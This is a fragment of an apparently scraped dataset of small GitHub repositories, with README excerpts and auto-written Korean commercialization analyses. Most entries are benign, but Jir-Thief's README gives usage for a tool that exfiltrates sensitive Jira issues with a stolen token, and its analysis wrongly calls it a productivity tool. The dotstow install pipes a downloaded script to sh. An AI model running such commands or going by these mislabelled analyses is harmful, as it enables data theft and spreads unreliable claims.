[Inner Loop and Outer Loop](#inner-loop-and-outer-loop)\n  - [Getting Set Up](#getting-set-up)\n  - [Run the Sample App](#run-the-sample-app)\n  - [Spring Boot Devtools](#spring-boot-devtools)\n  - [Build a Container](#build-a-container)\n  - [Skaffold](#skaffold)\n  - [Telepresence](#telepresence)\n  - [Telepresence 0.1](#telepresence-01)\n  - [Tilt](#tilt)\n\n## [Inner Loop](https://github.com/spring-projects/spring-boot/issues/22691) and Outer Loop\n\nInner Loop:\n\n* Make a small change to code\n* See it wiggle\n* Debugger\n* Iterate\n\nOuter Loop:\n\n* Push a change to remote repository\n* Automation builds, tests and promotes code to runtime\n* Continuous Deployment\n* Testing in production \n\n## Getting Set Up\n\nTo explore the ","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"paopao233/OnlineFreeApi","github_url":"https://github.com/paopao233/OnlineFreeApi","stars":22,"language":"","license":"MPL-2.0","abandonment_months":48,"description":"# OnlineFreeApi 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 사용할 수 있는 무료 데이터 연결 서비스로, 개발자가 아닌 일반인도 필요한 정보를 자동으로 받아올 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 쇼핑몰이나 블로그가 환율, 날씨, 뉴스 정보를 자동으로 표시해주는 대시보드 서비스\n- **내부 업무 도구**:","readme_excerpt":"# onlineFreeApi\n收集网上的实用又免费的在线apI接口，让每个开发者都可以很方便的调用和测试！💞 <br>\n这些接口都是我测试的时候用过的！可以使用才会发布出来。不过也不排除接口提供者下线接口，<br>\n如果有这种情况出现，请及时私信我~\n对你有帮助的话，麻烦来个star吧~\n> 最后更新时间：2022年6月14日\n# 收集\n要是有好玩且使用、稳定的接口，大家也可以加我tg联系我添加 TG：parklot Email:1319082534#qq.com\n不过这些接口稳定性也是不知道，所以如果要正式运行使用的话请谨慎！\n\n# 微信公众号\n> 大家可以关注一下我的公众号：ObjectSky \n<!-- <img src=\"https://github.com/paopao233/OnlineFreeApi/blob/main/%E6%89%AB%E7%A0%81_%E6%90%9C%E7%B4%A2%E8%81%94%E5%90%88%E4%BC%A0%E6%92%AD%E6%A0%B7%E5%BC%8F-%E6%A0%87%E5%87%86%E8%89%B2%E7%89%88.png\" width=\"50%\"> -->\n\n## 捐赠\n<img src=\"https://s.pc.qq.com/tousu/img/20211104/3053708_1636019868.jpg\" width=\"50%\">\n\n\n# 目录\n> 每一家的接口我都会做一个目录标题出来，方便大家查看。（最上面是最新更新的）\n* [三三酱-API](https://github.com/paopao233/OnlineFreeApi/blob/main/README.md#%E4%B8%89%E4%B8%89%E9%85%B1-api)\n* [零七生活API](https://github.com/paopao233/OnlineFreeApi#%E9%9B%B6%E4%B8%83%E7%94%9F%E6%B4%BBapi)\n* [UomgAPI](https://github.com/paopao233/OnlineFreeApi#uomgapi)\n* [alapi](https://github.com/paopao233/OnlineFreeApi#alapi)\n* [unGe1","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"InfuseAI/crane","github_url":"https://github.com/InfuseAI/crane","stars":7,"language":"TypeScript","license":"Apache-2.0","abandonment_months":53,"description":"# InfuseAI/Crane 분석\n\n## 왜 보물인가\n대규모 데이터를 효율적으로 처리하는 오픈소스 도구로, 기업들이 비용을 절감하면서 복잡한 데이터 작업을 간편하게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 처리가 필요한 분석 플랫폼에 내장하여 고객에게 더 빠른 분석 결과 제공\n- **내부 업무 도구**: 대기업의","readme_excerpt":"<img src=\"./public/images/Logo_hori.png\" alt=\"Crane\" style=\"height: 130px;\">\n\n[![GitHub release](https://img.shields.io/github/release/infuseAI/crane/all.svg)](https://github.com/infuseAI/crane/releases)\n![workflow](https://github.com/InfuseAI/crane/actions/workflows/build.yml/badge.svg?branch=main)\n![](https://img.shields.io/badge/Present-InfuseAI-blue)\n![](https://img.shields.io/badge/Made%20with-%E2%9D%A4-red)\n[![InfuseAI Discord Invite](https://img.shields.io/discord/664381609771925514?color=%237289DA&label=chat&logo=discord&logoColor=white)](https://discord.gg/ZE8pQ8gRWy)\n\n[![](https://api.producthunt.com/widgets/embed-image/v1/featured.svg?post_id=crane)](https://www.producthunt.com/posts/crane)\n\nAn easy and beautiful way to manage and build your container images.\n\nCrane helps people building machine-learning notebook container images.\n\nCheck [this article](https://medium.com/infuseai/crane-the-minimalist-container-image-builder-68253722be8c) for more initiatives about Crane.\n\n> ","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"Eversmile12/NFT-Marketplace-Solidity-Hardhat-NexJS-Web3js-Tailwind","github_url":"https://github.com/Eversmile12/NFT-Marketplace-Solidity-Hardhat-NexJS-Web3js-Tailwind","stars":13,"language":"JavaScript","license":"unknown","abandonment_months":40,"description":"# NFT-Marketplace-Solidity-Hardhat-NexJS-Web3js-Tailwind 분석\n\n## 왜 보물인가\n블록체인 기술을 활용해 디지털 자산을 사고팔 수 있는 온라인 장터를 직접 만들 수 있는 완성된 개발 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **NFT 마켓플레이스 SaaS**: 아티스트나 게임 회사가 월 구독으로 자신만의","readme_excerpt":"# NFT Marketplace Tutorial\n![image](https://user-images.githubusercontent.com/72762629/144294953-794143cc-d00c-4176-96d9-4d5c1aea9b64.png)\n\nThis repository is related to the [upcoming] tutorial. It contains the boilerplates code for a functioning Ethereum NFT marketplace.\n\n## Prerequisites\n- Metamask\n\n## Installation\n\nInstall the node packages:\n\n```bash\nyarn install\n```\n\nCompile the Smart Contracts:\n```bash\nnpx hardhat compile\n```\n\nYou have two ways to interact with the NFT Marketplace:\n- Locally using Hardhat\n- Deploying the contracts on Polygon Mumbai-testnet\n\n## Deploying the NFTMarketplace locally\n\nOpen your terminal and run:\n```bash\nnpx hardhat node\n```\n\nThis will start a local Ethereum blockchain node, log 19 wallets and their private keys.\n\nNow in a new terminal window run:\n\n```bash\nnpx hardhat run ./scripts/deploy.js --network localhost\n```\nThis will deploy the contracts on the local ethereum node and print out their addresses (see: change contracts address section)\n\n## Deployi","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"fossasia/loklak_telegrambot","github_url":"https://github.com/fossasia/loklak_telegrambot","stars":12,"language":"Python","license":"MIT","abandonment_months":127,"description":"# fossasia/loklak_telegrambot 분석\n\n## 왜 보물인가\n텔레그램 메신저에서 바로 검색과 정보 공유를 할 수 있게 만들어진 도구로, 메신저 사용자들의 정보 접근성을 크게 높입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 메신저 봇 플랫폼으로 구독형 검색 기능 제공\n- **내부 업무 도구**: 회사 직원들이 텔레그","readme_excerpt":"# Tweets search bot\nTelegram bot for searching tweets by Loklak API: https://telegram.me/loklakbot\n## Install\n```\ngit clone git@github.com:sevazhidkov/tweets-search-bot.git\ncd tweets-search-bot\npip install -r requirements.txt\n```\n## Run\n```\npython bot.py\n```\nDon't forget to change your telegram bot token.\nIt is in token_list.py file. The variable should be named TOKEN1 \n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"hannawong/ColXLM","github_url":"https://github.com/hannawong/ColXLM","stars":13,"language":"Python","license":"MIT","abandonment_months":55,"description":"# ColXLM 저장소 분석\n\n## 왜 보물인가\n여러 나라 언어를 동시에 이해하고 비교 분석할 수 있는 AI 기술로, 글로벌 서비스를 운영하는 기업들이 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **다국어 고객 지원 SaaS**: 한국, 일본, 중국 고객의 문의를 자동으로 분류하고 대응하는 챗봇 서비스\n2. **번역 회사의 내부 도구**","readme_excerpt":"# Multilingual Information Retrieval Model for Yelp Search Engine\n\nHi there! 👋 In this repository, we develop a Multilingual Information Retrieval model that support 15 different languages, and it will be used on Yelp search engine after further online experiments. \n\n<p align=\"center\">\n  <img align=\"center\" src=\"fig/yelp.PNG\" />\n</p>\n<p align=\"center\">\n  <b>Figure 1:</b> Yelp's search interface\n</p>\n\n## Background\nThe current search engine of Yelp is based on [NrtSearch](https://engineeringblog.yelp.com/2021/09/nrtsearch-yelps-fast-scalable-and-cost-effective-search-engine.html). However, inverted index-based lexical matching on Lucene-based search engine such as NrtSearch falls short in several key aspects: \n- Lack of understanding of hypernyms, synonyms, and antonyms. For example, *\"sneaker\"* might match the intent of the query *\"running shoes\"*, but may not be retrieved.\n- Fragility of morphological variants (e.g. *woman* vs. *women*)\n- Sensitivity to spelling errors\n- Inability to ","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"gisbi-kim/modern-slam-tutorial-python","github_url":"https://github.com/gisbi-kim/modern-slam-tutorial-python","stars":11,"language":"Jupyter Notebook","license":"BSD-2-Clause","abandonment_months":57,"description":"# modern-slam-tutorial-python 분석\n\n## 왜 보물인가\n로봇이나 자동차가 주변 환경을 인식하고 자기 위치를 파악하는 기술을 배울 수 있는 한국어 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **자율주행 교육 플랫폼**: 대학교나 교육기관이 로봇 비전 강좌를 온라인으로 제공하는 SaaS 서비스\n2. **로봇 개발사 내부 교육**","readme_excerpt":"# modern-slam-tutorial-python\n- Learning and feeling SLAM together with hands-on-experiments :grinning: :smiley:\t:laughing:\n\n## Dependencies\n- Most of the examples are based on GTSAM. use `$ pip install gtsam` and I prefer using conda environment. \n    - Also, I'll (want to) also use Pytorch to study recent differentiable factor-graph optimization works.\n\n## Contents \n1. [robust_pgo](https://github.com/gisbi-kim/modern-slam-tutorial-python/tree/main/robust_pgo): a robust pose-graph optimization \n    - [Tutorial video](https://youtu.be/zOr9HreMthY)\n    - Dependencies: numpy, GTSAM (python)\n    - The datasets are available from https://lucacarlone.mit.edu/datasets/\n\n*To be continued ...*\n\n## Contact\n- `gisbi.kim@gmail.com`\n\n## Plan\n- Other geometric optimization for SLAM\n    - Non-rigid ICP \n    - Rotation initialization \n    - ...\n- Trying GTSAM integration with Open3D, scipy, Pytorch, etc ... \n\n\n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"J0B10/aoc-badges-action","github_url":"https://github.com/J0B10/aoc-badges-action","stars":17,"language":"Python","license":"MIT","abandonment_months":28,"description":"# AOC Badges Action 분석\n\n## 왜 보물인가\n프로그래밍 대회 참가자들이 자신의 성과를 자동으로 배지로 만들어 포트폴리오에 표시할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 학습 플랫폼**: 코딩 부트캠프나 온라인 교육 서비스가 수료자 인증 배지를 자동 생성하는 기능으로 통합\n2. **기업 사내 교육 시스템**: 직원","readme_excerpt":"# AoC-badges\nGithub Action to update the [badges](https://github.com/badges/shields) of your Readme to show your current stats for [Advent of Code](https://adventofcode.com/).\n\nHave a look at these examples:\n\n![](https://img.shields.io/badge/day%20📅-22-blue)\n![](https://img.shields.io/badge/stars%20⭐-34-yellow)\n\n## Setup\nFirst of all you have to add the badges to your README.\nYou can use only some of them or even customize them to fit your needs.  \nNote that if you want to customize the badges you might have to tweak the regular expressions used to match your badges.\nHere are the default ones:\n\n| Badge                                                    | Raw Badge                                                 | Description                                            |\n|----------------------------------------------------------|-----------------------------------------------------------|--------------------------------------------------------|\n| ![](https://img.shields.io/badge/day%20📅","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"ming1016/MethodTraceAnalyze","github_url":"https://github.com/ming1016/MethodTraceAnalyze","stars":6,"language":"Swift","license":"Apache-2.0","abandonment_months":76,"description":"# MethodTraceAnalyze 상용화 분석\n\n## 왜 보물인가\n앱이나 프로그램이 어디서 느려지는지 정확히 찾아주는 도구로, 소프트웨어 품질 향상에 직접적으로 기여합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 성능 분석 플랫폼으로 구독 모델로 판매\n2. **내부 업무 도구**: 회사의 모든 앱 성능을 모니터링하는 엔터프라이","readme_excerpt":"# MethodTraceAnalyze\n方法耗时分析\n\n介绍参见：https://ming1016.github.io/2019/12/07/how-to-analyze-startup-time-cost-in-ios/\n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"gupta-abhay/pytorch-frn","github_url":"https://github.com/gupta-abhay/pytorch-frn","stars":10,"language":"Python","license":"MIT","abandonment_months":77,"description":"","readme_excerpt":"# Filter Response Normalization Layer in PyTorch\n\nThis repository contains a direct usable module for the recently released [Filter Response Normalization Layer](#reference).\n\n## Features\n\n- 1D, 2D, 3D FilterResponseNorm\n- Learnable epsilon parameter\n\n## Contributors\n\n* [Abhay Gupta](https://github.com/gupta-abhay)\n* [Huang Lianghua](https://github.com/huanglianghua)\n\n## Baselines\n\n* [Implementation by Yuxin Wu](https://github.com/ppwwyyxx/FRN-on-common-ImageNet-baseline) \n\n## References\n\n[1] [Filter Response Normalization Layer: Eliminating Batch Dependence in the Training of Deep Neural Networks](https://arxiv.org/abs/1911.09737)\n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"julienbourdeau/route-usage","github_url":"https://github.com/julienbourdeau/route-usage","stars":8,"language":"PHP","license":"MIT","abandonment_months":59,"description":"","readme_excerpt":"# Route Usage for Laravel\n\n[![Latest Version on Packagist](https://img.shields.io/packagist/v/julienbourdeau/route-usage.svg?style=flat-square)](https://packagist.org/packages/julienbourdeau/route-usage)\n[![Build Status](https://img.shields.io/travis/julienbourdeau/route-usage/master.svg?style=flat-square)](https://travis-ci.org/julienbourdeau/route-usage)\n\nThis package keeps track of all requests to know what controller method, and when it was called. The goal is not to build some sort of analytics but to find out if there are unused endpoints or controller method.\n\nAfter a few years, any projects have dead code and unused endpoint. Typically, you removed a link on your frontend, nothing ever links to that old `/special-page`. You want to remove it, but you're not sure.\nHave look at the `route_usage` table and figure out when this page was accessed for the last time. Last week? Better keep it for now. 3 years ago? REMOVE THE CODE! 🥳\n\n\n<img width=\"984\" alt=\"/route-usage screenshot\" src","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"lunatic-solutions/async-wormhole","github_url":"https://github.com/lunatic-solutions/async-wormhole","stars":5,"language":"Rust","license":"unknown","abandonment_months":30,"description":"# async-wormhole 분석\n\n## 왜 보물인가\n프로그램 간에 데이터를 빠르고 안전하게 주고받을 수 있는 기술로, 복잡한 시스템 연결을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 메시지 전송 SaaS**: 채팅이나 알림 서비스에서 여러 사용자에게 동시에 메시지를 보낼 때\n2. **자동화 업무 도구**: 회사 내 여러 시스템(이","readme_excerpt":"# async-wormhole\n\n[Documentation](https://docs.rs/async-wormhole/latest/async_wormhole/)\n\n> This library is experimental, I use it to prototype the foundation for [Lunatic](https://lunatic.solutions/) .\n>\n> **Currently only works in Rust nightly, as it depends on [switcheroo](https://github.com/bkolobara/async-wormhole/tree/master/switcheroo).**\n\nasync-wormhole allows you to `.await` async calls in non-async functions, like extern \"C\" or JIT generated code.\nIt runs on Windows, MacOs and Linux (x64 & AArch64).\n\n## Motivation\n\nSometimes, when running inside an async environment you need to call into JIT generated code (e.g. wasm)\nand .await from there. Because the JIT code is not available at compile time, the Rust compiler can't\ndo their \"create a state machine\" magic. In the end you can't have `.await` statements in non-async\nfunctions.\n\nThis library creates a special stack for executing the JIT code, so it's possible to suspend it at any\npoint of the execution. Once you pass it a clos","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"jesseduffield/lazycli","github_url":"https://github.com/jesseduffield/lazycli","stars":7,"language":"Rust","license":"MIT","abandonment_months":35,"description":"# Lazycli 상용화 분석 보고서\n\n## 왜 보물인가\n복잡한 명령어를 간단한 메뉴로 변환해주는 도구로, 컴퓨터를 잘 모르는 사람도 전문가처럼 작업할 수 있게 만듭니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 관리 플랫폼에서 사용자가 복잡한 설정 없이 버튼 클릭만으로 서버를 관리할 수 있는 인터페이스 제공\n2. **내부 업무 ","readme_excerpt":"# lazycli\n\nTurn static CLI commands into TUIs with ease\n\n![Demo Animation](../assets/demo.gif?raw=true)\n\nDemo:\n\n[<img src=\"../assets/demo-thumbnail.png\" width=\"380px\">](https://www.youtube.com/watch?v=CRzcOpjuYSs&ab_channel=JesseDuffield)\n\n## Usage\n\nPick a command that spits out either a list or table of content, like `ls`, `docker ps`, `git branch`, or `git status --short`. Then run `lazycli -- <YOUR COMMAND>`\n```\nlazycli -- ls\n```\n\nIf you find yourself often using lazycli with a specific command, you can easily alias it like so:\n\n```\necho \"alias lcd=\\\"lazycli -- docker ps\\\"\" >> ~/.zshrc\nsource ~/.zshrc\nlcd\n```\n\nRight now some default keybindings are defined for common commands like `ls`, `docker ps`, `git branch`, `git status --short`, etc. But you can customise it for any commands you like! Just open the config file from within the program with `$` and start playing around.\n\nlazycli is best suited towards any command-line program that spits out a list of items or a table. In your co","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"EmilienDupont/neural-function-distributions","github_url":"https://github.com/EmilienDupont/neural-function-distributions","stars":16,"language":"Jupyter Notebook","license":"MIT","abandonment_months":31,"description":"# EmilienDupont/neural-function-distributions 분석\n\n## 왜 보물인가\n인공지능이 불확실성을 이해하고 표현할 수 있도록 돕는 기술로, 의료·금융·날씨 예측 같은 중요한 의사결정이 필요한 분야에서 AI의 신뢰성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 고객을 위한 \"AI 신뢰도 측정","readme_excerpt":"# Generative Models as Distributions of Functions\n\nThis repo contains code to reproduce all experiments in [Generative Models as Distributions of Functions](https://arxiv.org/abs/2102.04776).\n\n<img src=\"https://github.com/EmilienDupont/neural-function-distributions/raw/main/imgs/example.gif\" height=\"200\"> <img src=\"https://github.com/EmilienDupont/neural-function-distributions/raw/main/imgs/era5.gif\" height=\"200\">\n\n## Requirements\n\nRequirements for training the models can be installed using `pip install -r requirements.txt`. All experiments were run using `python 3.8.10`.\n\n## Training a model\n\nTo train a model on CelebAHQ64, run\n\n```python main.py configs/config_celebahq64.json```\n\nExample configs to reproduce the results in the paper are provided in the `configs` folder. Note that you will have to provide a path to the data you wish to train on in the config.\n\n## Downloading datasets\n\nThe shapenet and ERA5 climate datasets can be downloaded at this [link](https://drive.google.com/driv","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"iwayen/Azure-Helper","github_url":"https://github.com/iwayen/Azure-Helper","stars":10,"language":"","license":"unknown","abandonment_months":49,"description":"# Azure-Helper 사업화 분석\n\n## 왜 보물인가\n마이크로소프트 클라우드 서비스를 쉽게 관리할 수 있는 도구로, 기술 초보자도 복잡한 클라우드 작업을 간단하게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업을 위한 \"Azure 관리 대시보드\" 구독 서비스로 월 사용료 수취\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# Azure Helper介绍\n[Azure Helper @azure_Managerbot](https://t.me/azure_Managerbot)可以辅助管理azure账号，进行创建机器，开关机，换IP，删除机器等操作，同时采用多线程的方式批量创建机器，创建n台机器用时1min左右。\n\nAzure Helper创建的机器均为安全组全开、随机用户名、随机密码的机器。\n\nAzure Helper采用rest api进行操作，降低登录开机导致的风控问题，但并不代表可以完全规避风控，请自行决定是否使用。\n\n![](https://i0.hdslb.com/bfs/album/4008c8e66155abafd08279eb6f94ffe06903f91b.png)\n\n![](https://i0.hdslb.com/bfs/album/6911e6284097ec1fecba402c04d85ee0a0218e29.png)\n\n![](https://i0.hdslb.com/bfs/album/047323ab7e47bde6d5290857e3699c1002c99997.png)\n\n![](https://i0.hdslb.com/bfs/album/bd30ea782526673e65a628490173c80707431cce.png)\n\n![](https://i0.hdslb.com/bfs/album/500ce6e6c0fca44c4500cac81f6983f0a7185ab2.png)\n\n![](https://i0.hdslb.com/bfs/album/6697742a882fac296cca7caa499b89127d1d214a.png)\n\n![](https://i0.hdslb.com/bfs/album/5304e607b20ec3892f892c24344113b5e3bac2eb.png)\n\n![](https://i0.hdslb.com/bfs/album/8bf79e3b3e2610edfdbf0acefb04f060e59cd4e3.png)\n\n# Azure Helper使用\n\n面板基于rest api进行部署操作，所以我们需要先获取api，获取api目前只可以通过cli进行获取，可以采用azure提供的clo","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"antman1p/Jir-Thief","github_url":"https://github.com/antman1p/Jir-Thief","stars":16,"language":"Python","license":"unknown","abandonment_months":40,"description":"# Jir-Thief 보물 분석\n\n## 왜 보물인가\n업무 관리 시스템에서 자동으로 정보를 수집하고 활용할 수 있는 도구로, 반복적인 수작업을 줄이는 효율화 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로젝트 관리 자동화 플랫폼으로 월 구독료를 받고 기업들에게 판매\n2. **내부 업무 도구**: 대규모 조직의 IT팀이 자사 업무 ","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"static/jir_thief-banner.png\" alt=\"jir-thief\" width=\"400px\"></a>\n  <br>\n</h1>\n<p align=\"center\">\n<a href=\"https://twitter.com/antman1p\"><img src=\"https://img.shields.io/twitter/follow/antman1p.svg?logo=twitter\"></a>\n</p>\n\n# Jir-thief\nThis Module will connect to Jira's API using an access token, export to a word .doc, and download the Jira issues\nthat the target has access to. It allows you to use a dictionary/keyword search file to search all files in the target\nJira for potentially sensitive data. It will output exfiltrated DOCs to the ./loot directory\n## Dependencies\n`pip install requests`\n## Warning!!!  \nUsing the provided keyword list will produce a MASS of results, take a LONG time to search and download, and will send a LOT of API requests.  You might consider starting with a smaller list.\n## Usage\n```\npython3 jir_thief.py [-h] -j <TARGET URL> -u <Target Username> -p <API ACCESS TOKEN> -d <DICTIONARY FILE PATH> [-a] \"<UA STRING>\"\n\n\narguments:\n\t-j <T","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"ekmartin/bibtex-search","github_url":"https://github.com/ekmartin/bibtex-search","stars":24,"language":"JavaScript","license":"MIT","abandonment_months":103,"description":"# bibtex-search 보물 분석\n\n## 왜 보물인가\n논문이나 학술 자료를 찾아야 하는 사람들이 방대한 인용 정보 더미에서 원하는 자료를 빠르게 검색할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 학술 자료 검색 SaaS**\n대학 도서관이나 연구기관이 구독하는 논문 검색 플랫폼으로 제공할 수 있습니다.\n\n**2. 학위 논문 작성 지원 도","readme_excerpt":"# bibtex-search [![DroneCI](https://ci.abakus.no/api/badges/ekmartin/bibtex-search/status.svg?branch=master)](https://ci.abakus.no/ekmartin/bibtex-search)\n\n> Command-line interface for retrieving BibTeX references\n\n![bibtex-search](https://i.imgur.com/ARhwzbQ.gif)\n\nCurrently uses [ACM's Digital Library](https://dl.acm.org/),\n[Google Scholar](https://scholar.google.com/) and\n[IEEE Xplore](http://http://ieeexplore.ieee.org/) to find papers, but might\nsupport other sources in the future.\n\n## Installation\n\nbibtex-search needs at least version 7.6 of Node.js installed.\n\n```bash\n$ npm install --global bibtex-search\n```\n\n## Usage\n\n```bash\n$ bibtex-search <query>\n\nOptions:\n  --source, -s Where to find papers from (default: acm) - valid options: [acm, ieee, google]\n\nExamples:\n  $ bibtex-search bayou\n  $ bibtex-search --source google zaharia spark\n```\n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"codejamninja/dotstow","github_url":"https://github.com/codejamninja/dotstow","stars":22,"language":"Shell","license":"Apache-2.0","abandonment_months":25,"description":"","readme_excerpt":"# dotstow\n\n> manage dotfiles with git and stow\n\n![](assets/dotstow.png)\n\n`dotstow` is a tool to manage your dotfiles using Git and Stow.\nIt allows you to keep your dotfiles in a version control system\nand easily sync them across multiple computers, even computers with\ncompletely different operating systems.\n\n![](assets/wizard.jpeg)\n\n## Install\n\nTo install dotstow, run the following command:\n\n```sh\n$(curl --version >/dev/null 2>/dev/null && echo curl -L || echo wget -O-) https://gitlab.com/risserlabs/community/dotstow/-/raw/main/install.sh 2>/dev/null | sh\n```\n\nor\n\n```sh\ngit clone https://github.com/clayrisser/dotstow\ncd dotstow\nmake install\n```\n\n## Usage\n\n### 1. Initialize dotstow\n\nTo start using dotstow, you need to initialize it with your Git repository. Run the following command:\n\n```sh\ndotstow init <REPO>\n```\n\nReplace <REPO> with the your git repository. This will create a dotfiles folder in your home\ndirectory at `~/.local/state/dotstow/dotfiles` and clone your git repository into","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"alangabrielbs/Remover-Enquetes-do-LinkedIn","github_url":"https://github.com/alangabrielbs/Remover-Enquetes-do-LinkedIn","stars":27,"language":"JavaScript","license":"unknown","abandonment_months":54,"description":"# Remover-Enquetes-do-LinkedIn 분석\n\n## 왜 보물인가\nLinkedIn의 성가신 설문조사를 자동으로 제거해주는 도구로, 많은 사용자들이 원하는 간단한 문제 해결책입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형으로 LinkedIn 자동화 도구 플랫폼 내 추가 기능으로 제공\n- **내부 업무 도구**: 대기업","readme_excerpt":"# Remova enquetes do seu feed do LinkedIn\n\nInstalar no FireFox: https://addons.mozilla.org/pt-BR/firefox/addon/remover-enquetes-do-linkedin/\n\nInstalar no Google Chrome: https://alangabriel.dev/extensao\n\nAssim como eu você cansou de ver enquetes \"tudo por like\" na rede social que era legal até chegar os BRs para estragar como fazemos com tudo? kkkk Agora voce pode remover as enquetes...\n\nEu fiz a publicação da extensão na loja do Chrome, mas ainda está em analise, quando aprovada, deixo o link aqui\n","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"valkmit/aws-graviton2-on-intel","github_url":"https://github.com/valkmit/aws-graviton2-on-intel","stars":36,"language":"Shell","license":"unknown","abandonment_months":58,"description":"# AWS Graviton2 on Intel 저장소 분석\n\n## 왜 보물인가\n최신 프로세서 칩을 저가의 일반 컴퓨터에서 사용하는 기술로, 회사의 컴퓨팅 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **클라우드 비용 최적화 SaaS**: 기업들이 자신의 AWS 사용료를 자동으로 줄여주는 구독 서비스로 판매\n- **내부 기술 자문 도구**:","readme_excerpt":"# Prebuilt images available on Docker Hub\n\nhttps://hub.docker.com/r/valkmit/aws-graviton2-on-intel\n\n## What is this?\n\nAn Arm filesystem based off an AWS Graviton 2 system. All binaries are emulated\nunder Qemu, **EXCEPT** for a custom toolchain built with Buildroot. The\ntoolchain is run natively, allowing for up to _20x_ faster compile times than\nwhen emulated.\n\n```\n# file $(which bash)\n/usr/bin/bash: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.7.0, BuildID[sha1]=03b374959d488851f8b6ef51a6a16e55eaedea98, stripped\n\n# file $(realpath $(which aarch64-linux-gcc))\n/x86_64/host/bin/toolchain-wrapper: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, BuildID[sha1]=9c88d4609953b73d518a95e44ebc93d642a8174e, stripped\n```\n\n## Usage\n\nIf you wish to build the Docker image from source, you must run `./build.sh`.\nAt a minimum, you must provide the rootfs as a .tar.gz w","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"sahilpabale/noteli","github_url":"https://github.com/sahilpabale/noteli","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":32,"description":"# Noteli 저장소 분석\n\n## 왜 보물인가\n사용자들이 쉽게 메모와 노트를 정리하고 공유할 수 있는 간단한 웹 도구로, 별도 복잡한 설정 없이 바로 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 사용자나 팀이 구독하는 온라인 메모장 플랫폼으로 월간 요금 모델 운영\n2. **내부 업무 도구**: 기업의 회의록, 업무 ","readme_excerpt":"# noteli\n\nA CLI based Notes App built using TypeScript, MongoDB and Auth0.\n\n[![oclif](https://img.shields.io/badge/cli-oclif-brightgreen.svg)](https://oclif.io)\n[![Version](https://img.shields.io/npm/v/noteli.svg)](https://npmjs.org/package/noteli)\n[![Downloads/week](https://img.shields.io/npm/dw/noteli.svg)](https://npmjs.org/package/noteli)\n[![License](https://img.shields.io/npm/l/noteli.svg)](https://github.com/sahilpabale/noteli/blob/master/package.json)\n\n<!-- toc -->\n* [noteli](#noteli)\n* [Usage](#usage)\n* [Commands](#commands)\n<!-- tocstop -->\n\n# Usage\n\n<!-- usage -->\n```sh-session\n$ npm install -g noteli\n$ noteli COMMAND\nrunning command...\n$ noteli (-v|--version|version)\nnoteli/1.5.4 win32-x64 node-v14.16.1\n$ noteli --help [COMMAND]\nUSAGE\n  $ noteli COMMAND\n...\n```\n<!-- usagestop -->\n\n# Commands\n\n<!-- commands -->\n* [`noteli create`](#noteli-create)\n* [`noteli delete <ID>`](#noteli-delete-id)\n* [`noteli help [COMMAND]`](#noteli-help-command)\n* [`noteli login`](#noteli-login)\n* [","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"linbin524/yc.boilerplate","github_url":"https://github.com/linbin524/yc.boilerplate","stars":36,"language":"C#","license":"Apache-2.0","abandonment_months":55,"description":"# yc.boilerplate 상용화 분석\n\n## 왜 보물인가\n스타트업이 새로운 서비스를 빠르게 만들 수 있도록 미리 준비된 틀을 제공하는 프로젝트로, 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 이 틀을 구매해 자신들의 웹 서비스를 빠르게 만들고 런칭할 수 있습니다.\n2. **내부 ","readme_excerpt":"# YC.Boilerplate\r\n\r\n#### 